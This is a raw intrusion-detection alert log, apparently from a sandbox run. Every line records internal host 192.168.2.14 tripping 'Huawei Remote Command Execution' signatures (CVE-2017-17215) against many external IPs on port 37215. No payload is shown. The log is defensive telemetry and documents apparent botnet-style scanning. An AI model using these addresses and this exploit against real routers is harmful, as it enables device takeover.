                                                    07/10/24-08:26:22.278406TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4072237215192.168.2.1441.53.9.90
                                                    07/10/24-08:27:32.602329TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4376037215192.168.2.14101.173.19.241
                                                    07/10/24-08:27:31.473922TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3469437215192.168.2.1441.71.137.21
                                                    07/10/24-08:27:11.568589TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3753237215192.168.2.14197.159.250.22
                                                    07/10/24-08:26:28.880093TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4925837215192.168.2.14157.103.183.74
                                                    07/10/24-08:26:42.425783TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5336237215192.168.2.1441.73.145.80
                                                    07/10/24-08:26:49.816835TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4812637215192.168.2.14197.232.28.83
                                                    07/10/24-08:26:34.207017TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5491237215192.168.2.14106.141.89.16
                                                    07/10/24-08:26:42.416063TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3322437215192.168.2.14157.144.157.39
                                                    07/10/24-08:26:18.030182TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5212637215192.168.2.148.250.244.157
                                                    07/10/24-08:26:41.553894TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3911637215192.168.2.14157.101.153.78
                                                    07/10/24-08:26:15.872780TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5644837215192.168.2.1441.92.31.187
                                                    07/10/24-08:26:47.879237TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4547837215192.168.2.14197.51.111.193
                                                    07/10/24-08:27:10.655390TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3401837215192.168.2.1441.130.91.196
                                                    07/10/24-08:26:31.094211TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3482837215192.168.2.14136.225.208.138
                                                    07/10/24-08:26:38.577116TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5095637215192.168.2.1478.227.170.95
                                                    07/10/24-08:27:34.131322TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5876037215192.168.2.1441.154.90.31
                                                    07/10/24-08:26:28.827711TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5927637215192.168.2.14157.33.12.241
                                                    07/10/24-08:26:45.668696TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5685437215192.168.2.14197.81.175.151
                                                    07/10/24-08:26:41.550813TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3617037215192.168.2.14157.154.147.9
                                                    07/10/24-08:27:22.794160TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5408837215192.168.2.14197.111.250.156
                                                    07/10/24-08:27:22.878733TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4657437215192.168.2.14157.97.0.164
                                                    07/10/24-08:27:33.959162TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4465437215192.168.2.1441.5.12.229
                                                    07/10/24-08:26:25.460773TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3327637215192.168.2.1418.12.187.89
                                                    07/10/24-08:27:34.117875TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4514837215192.168.2.1441.8.176.60
                                                    07/10/24-08:26:11.593269TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3396837215192.168.2.1441.29.129.224
                                                    07/10/24-08:27:22.482500TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3513637215192.168.2.14157.70.50.230
                                                    07/10/24-08:27:11.544699TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5779037215192.168.2.14137.19.8.225
                                                    07/10/24-08:27:36.280780TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3981637215192.168.2.1441.182.241.50
                                                    07/10/24-08:27:08.417840TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5604637215192.168.2.14157.198.211.202
                                                    07/10/24-08:26:55.364667TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5971437215192.168.2.1449.149.35.40
                                                    07/10/24-08:26:14.622208TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5977437215192.168.2.14157.213.218.72
                                                    07/10/24-08:27:22.563046TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4128637215192.168.2.14157.121.57.61
                                                    07/10/24-08:26:13.664238TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5595237215192.168.2.1441.169.70.119
                                                    07/10/24-08:26:23.305077TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4319637215192.168.2.1441.16.21.171
                                                    07/10/24-08:27:14.837322TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3685437215192.168.2.14147.122.48.30
                                                    07/10/24-08:26:20.118074TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5195637215192.168.2.14197.122.52.96
                                                    07/10/24-08:26:38.536872TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4099037215192.168.2.14157.113.47.94
                                                    07/10/24-08:26:36.330263TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5259037215192.168.2.1440.211.28.52
                                                    07/10/24-08:26:33.231077TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5753837215192.168.2.1441.16.133.113
                                                    07/10/24-08:27:31.528141TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4767237215192.168.2.14197.66.81.48
                                                    07/10/24-08:26:20.159538TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5165237215192.168.2.14157.217.111.216
                                                    07/10/24-08:26:59.652000TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5839437215192.168.2.1441.136.58.43
                                                    07/10/24-08:26:25.438219TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4585437215192.168.2.14197.7.64.144
                                                    07/10/24-08:26:26.588414TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5554237215192.168.2.1441.239.15.88
                                                    07/10/24-08:27:33.719591TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3524037215192.168.2.14157.249.217.180
                                                    07/10/24-08:26:11.162688TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5227837215192.168.2.14197.23.163.14
                                                    07/10/24-08:26:41.439991TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5003637215192.168.2.1479.241.2.31
                                                    07/10/24-08:27:32.596186TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4858837215192.168.2.14160.118.48.1
                                                    07/10/24-08:26:47.914277TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5604637215192.168.2.14197.99.245.70
                                                    07/10/24-08:26:45.632406TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5147037215192.168.2.1441.78.105.52
                                                    07/10/24-08:26:38.637224TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3594037215192.168.2.14157.253.172.147
                                                    07/10/24-08:26:43.698482TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3937637215192.168.2.14173.104.63.173
                                                    07/10/24-08:27:10.598272TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4607837215192.168.2.14157.217.173.118
                                                    07/10/24-08:26:42.374424TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3757637215192.168.2.1441.0.115.110
                                                    07/10/24-08:26:22.264063TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3546437215192.168.2.14157.214.213.0
                                                    07/10/24-08:27:22.535302TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5935437215192.168.2.14157.223.14.198
                                                    07/10/24-08:26:17.959053TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3384437215192.168.2.1441.251.150.134
                                                    07/10/24-08:26:15.879518TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4823237215192.168.2.14197.253.91.102
                                                    07/10/24-08:27:28.174408TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5357437215192.168.2.1441.133.40.88
                                                    07/10/24-08:27:22.455545TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3974637215192.168.2.1441.41.167.138
                                                    07/10/24-08:27:22.455545TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5770237215192.168.2.14197.116.68.4
                                                    07/10/24-08:27:23.900911TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5699037215192.168.2.14157.22.91.221
                                                    07/10/24-08:26:13.647460TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3701837215192.168.2.14197.110.93.162
                                                    07/10/24-08:26:13.852643TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5565437215192.168.2.1489.61.31.168
                                                    07/10/24-08:27:14.875124TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4554437215192.168.2.14114.75.197.55
                                                    07/10/24-08:27:31.530342TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3768037215192.168.2.14197.160.110.180
                                                    07/10/24-08:27:32.532227TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3604637215192.168.2.1441.53.197.77
                                                    07/10/24-08:26:34.196006TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4553837215192.168.2.14197.65.59.213
                                                    07/10/24-08:27:31.547528TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5172837215192.168.2.14197.170.209.13
                                                    07/10/24-08:26:22.282645TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4509237215192.168.2.1441.42.0.34
                                                    07/10/24-08:27:10.595154TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4046437215192.168.2.14197.125.138.79
                                                    07/10/24-08:26:15.812623TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5880837215192.168.2.14197.112.212.51
                                                    07/10/24-08:26:25.429135TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4912837215192.168.2.14197.182.239.109
                                                    07/10/24-08:27:13.867822TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4137237215192.168.2.14158.186.206.92
                                                    07/10/24-08:26:28.787394TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3835037215192.168.2.1441.215.244.238
                                                    07/10/24-08:27:20.434935TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5908837215192.168.2.1441.29.26.245
                                                    07/10/24-08:26:20.119674TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3827037215192.168.2.14197.160.129.91
                                                    07/10/24-08:26:28.841880TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3930837215192.168.2.1441.233.248.230
                                                    07/10/24-08:27:14.853169TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5451837215192.168.2.14197.37.47.157
                                                    07/10/24-08:26:22.234454TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4733837215192.168.2.1447.181.185.114
                                                    07/10/24-08:26:36.342086TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5667837215192.168.2.14173.64.83.167
                                                    07/10/24-08:26:43.914559TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4473637215192.168.2.14157.240.13.176
                                                    07/10/24-08:26:18.030544TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5064837215192.168.2.14157.226.41.117
                                                    07/10/24-08:26:29.883376TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5519437215192.168.2.1441.69.50.232
                                                    07/10/24-08:27:31.459997TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3658837215192.168.2.14157.181.230.196
                                                    07/10/24-08:27:30.562651TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4155637215192.168.2.14199.29.164.94
                                                    07/10/24-08:26:23.348963TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4728237215192.168.2.14157.187.102.36
                                                    07/10/24-08:26:34.234133TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4917237215192.168.2.14192.240.158.175
                                                    07/10/24-08:27:05.230730TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3349237215192.168.2.14197.145.14.72
                                                    07/10/24-08:26:43.681419TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5875437215192.168.2.14197.141.45.88
                                                    07/10/24-08:26:59.835499TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4503837215192.168.2.14120.107.88.236
                                                    07/10/24-08:26:52.033038TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3891837215192.168.2.1475.199.162.35
                                                    07/10/24-08:27:13.988914TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5414037215192.168.2.14112.26.29.246
                                                    07/10/24-08:26:20.179402TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4721437215192.168.2.14111.245.142.10
                                                    07/10/24-08:26:14.808084TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5414037215192.168.2.14157.199.60.242
                                                    07/10/24-08:27:33.874571TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5879837215192.168.2.1441.251.112.76
                                                    07/10/24-08:27:05.128413TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3596837215192.168.2.14157.194.117.57
                                                    07/10/24-08:27:23.953433TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5683237215192.168.2.14156.96.179.232
                                                    07/10/24-08:26:43.922167TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5164237215192.168.2.14145.250.187.196
                                                    07/10/24-08:27:16.990207TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3531237215192.168.2.14197.87.48.212
                                                    07/10/24-08:27:22.562470TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4343237215192.168.2.149.35.50.160
                                                    07/10/24-08:26:11.572595TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3669037215192.168.2.14103.53.85.88
                                                    07/10/24-08:26:53.114397TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4774837215192.168.2.14131.198.26.71
                                                    07/10/24-08:26:55.320673TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4603037215192.168.2.1441.54.2.40
                                                    07/10/24-08:27:30.530198TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5964637215192.168.2.14157.18.107.145
                                                    07/10/24-08:27:05.122105TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4681237215192.168.2.14157.253.247.26
                                                    07/10/24-08:27:13.869693TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4576037215192.168.2.14219.212.245.161
                                                    07/10/24-08:26:53.204371TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4880637215192.168.2.1441.130.37.232
                                                    07/10/24-08:27:08.410615TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5927037215192.168.2.1458.145.162.13
                                                    07/10/24-08:27:17.074634TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5954637215192.168.2.14157.190.224.54
                                                    07/10/24-08:26:41.555583TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4948437215192.168.2.14197.45.141.38
                                                    07/10/24-08:26:49.910332TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5222837215192.168.2.1441.182.241.231
                                                    07/10/24-08:26:59.865437TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4053637215192.168.2.14197.74.160.203
                                                    07/10/24-08:27:22.871657TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5627637215192.168.2.14157.148.213.40
                                                    07/10/24-08:27:24.937282TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4246637215192.168.2.1437.115.67.4
                                                    07/10/24-08:26:14.811319TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4792037215192.168.2.14157.159.174.131
                                                    07/10/24-08:27:27.053568TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3615237215192.168.2.1441.46.174.254
                                                    07/10/24-08:26:33.251804TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6026837215192.168.2.14157.91.0.43
                                                    07/10/24-08:27:30.510691TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4401637215192.168.2.14157.111.4.255
                                                    07/10/24-08:26:47.837566TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3564037215192.168.2.14197.205.116.166
                                                    07/10/24-08:26:49.770059TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5495037215192.168.2.14157.111.173.69
                                                    07/10/24-08:26:59.822486TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4061037215192.168.2.14157.174.4.161
                                                    07/10/24-08:27:11.523000TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5030637215192.168.2.1441.19.189.116
                                                    07/10/24-08:26:29.661405TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3435437215192.168.2.1443.14.133.58
                                                    07/10/24-08:26:15.871389TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4719237215192.168.2.14197.74.93.216
                                                    07/10/24-08:26:48.032433TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4773037215192.168.2.14197.95.199.13
                                                    07/10/24-08:27:22.527707TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5825237215192.168.2.14157.215.125.10
                                                    07/10/24-08:27:10.699441TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3542837215192.168.2.14157.208.121.7
                                                    07/10/24-08:27:08.431901TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4750837215192.168.2.1436.107.47.7
                                                    07/10/24-08:27:20.509874TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4090037215192.168.2.14157.71.77.198
                                                    07/10/24-08:27:27.050359TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3655237215192.168.2.1441.178.67.105
                                                    07/10/24-08:26:17.992846TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5347037215192.168.2.1438.69.98.99
                                                    07/10/24-08:26:47.967087TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5805637215192.168.2.14128.239.182.133
                                                    07/10/24-08:26:48.708629TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5599037215192.168.2.1441.2.191.23
                                                    07/10/24-08:26:36.391791TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4345037215192.168.2.1438.251.203.24
                                                    07/10/24-08:26:59.640605TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4336637215192.168.2.14157.198.110.107
                                                    07/10/24-08:26:33.245914TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5382037215192.168.2.1441.196.51.82
                                                    07/10/24-08:26:26.603545TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3490037215192.168.2.14197.31.33.0
                                                    07/10/24-08:26:11.659473TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3727037215192.168.2.14157.13.78.138
                                                    07/10/24-08:26:13.780678TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4016637215192.168.2.14157.27.79.255
                                                    07/10/24-08:26:13.755859TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4614437215192.168.2.14197.70.125.175
                                                    07/10/24-08:27:11.531536TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6031637215192.168.2.1441.38.196.181
                                                    07/10/24-08:27:17.102035TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5669037215192.168.2.14197.131.128.21
                                                    07/10/24-08:26:13.647061TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5337837215192.168.2.1441.77.33.193
                                                    07/10/24-08:26:14.622082TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5879837215192.168.2.14197.97.5.171
                                                    07/10/24-08:26:59.878182TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4015437215192.168.2.14157.33.74.242
                                                    07/10/24-08:26:59.636045TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3544437215192.168.2.14143.5.22.203
                                                    07/10/24-08:26:23.359612TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3887037215192.168.2.1445.98.127.104
                                                    07/10/24-08:27:32.540139TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4869437215192.168.2.14131.244.216.150
                                                    07/10/24-08:26:17.994829TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4517837215192.168.2.14197.169.14.145
                                                    07/10/24-08:27:33.845766TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4292437215192.168.2.1441.32.146.52
                                                    07/10/24-08:26:45.619678TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5872437215192.168.2.14197.240.58.135
                                                    07/10/24-08:27:17.109836TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4815637215192.168.2.14197.252.166.193
                                                    07/10/24-08:26:17.959053TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3965437215192.168.2.14197.170.16.209
                                                    07/10/24-08:26:43.766311TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4633437215192.168.2.14197.118.152.202
                                                    07/10/24-08:27:31.550771TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3318037215192.168.2.14197.47.124.145
                                                    07/10/24-08:26:29.833709TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3314437215192.168.2.14197.90.142.253
                                                    07/10/24-08:26:55.437797TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3345037215192.168.2.14122.50.126.19
                                                    07/10/24-08:27:23.453421TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4869237215192.168.2.14157.16.52.236
                                                    07/10/24-08:26:43.671391TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5069837215192.168.2.1441.48.106.103
                                                    07/10/24-08:27:23.932047TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4163237215192.168.2.1441.183.215.157
                                                    07/10/24-08:26:23.322127TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3418237215192.168.2.1441.105.59.34
                                                    07/10/24-08:26:42.459051TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4480837215192.168.2.14157.231.1.87
                                                    07/10/24-08:26:47.851193TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3320237215192.168.2.1441.28.194.3
                                                    07/10/24-08:26:51.994120TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3776637215192.168.2.14197.244.66.4
                                                    07/10/24-08:26:36.431557TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4332637215192.168.2.14128.252.104.142
                                                    07/10/24-08:26:26.528508TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5314837215192.168.2.1441.84.239.20
                                                    07/10/24-08:27:13.982789TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4098037215192.168.2.14197.79.134.231
                                                    07/10/24-08:27:03.007894TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4630037215192.168.2.14126.43.26.137
                                                    07/10/24-08:27:10.553055TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4391637215192.168.2.14157.181.24.40
                                                    07/10/24-08:27:31.571103TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5665837215192.168.2.1434.81.205.142
                                                    07/10/24-08:26:28.859810TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5918237215192.168.2.1441.101.111.57
                                                    07/10/24-08:26:41.533380TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4439637215192.168.2.14197.211.239.88
                                                    07/10/24-08:27:24.970396TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4986237215192.168.2.1441.101.108.56
                                                    07/10/24-08:27:02.686169TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5382237215192.168.2.14131.175.122.205
                                                    07/10/24-08:26:59.648559TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5417637215192.168.2.14104.89.89.26
                                                    07/10/24-08:26:45.591326TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4625637215192.168.2.1441.162.243.59
                                                    07/10/24-08:26:18.004122TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3495237215192.168.2.14197.163.130.73
                                                    07/10/24-08:27:13.869693TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3914037215192.168.2.14157.15.46.16
                                                    07/10/24-08:27:19.347506TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4441237215192.168.2.1441.50.91.220
                                                    07/10/24-08:26:57.631188TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5461837215192.168.2.1482.7.10.106
                                                    07/10/24-08:27:10.767328TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4197837215192.168.2.14197.114.236.242
                                                    07/10/24-08:27:22.480250TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6024037215192.168.2.14197.17.81.150
                                                    07/10/24-08:26:28.736884TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4828837215192.168.2.1486.107.142.31
                                                    07/10/24-08:27:11.503966TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3525037215192.168.2.14197.1.171.40
